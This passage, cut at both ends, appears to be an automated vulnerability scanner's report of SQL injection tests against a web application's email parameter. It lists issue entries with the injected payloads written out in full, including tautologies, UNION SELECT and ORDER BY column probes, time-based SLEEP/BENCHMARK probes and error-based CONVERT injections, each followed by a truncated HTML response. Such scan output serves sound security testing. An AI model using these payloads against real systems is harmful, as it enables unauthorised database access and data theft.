name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1023\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' or true--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1024\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))--ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1025\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@deepfence.io\nCWE-ID CWE-89\nIssue Number #1026\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1027\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1028\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 28\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1029Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1030\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+\nCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1031\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1032\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io/*\u2026*/\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1033\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io \")) or ((\"x\"))=((\"x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1034\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 21#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1035\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters demouser@\ndeepfence.ioadmin\" --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1036\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ' UNION SELECT sum(columnname ) from tablename\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script 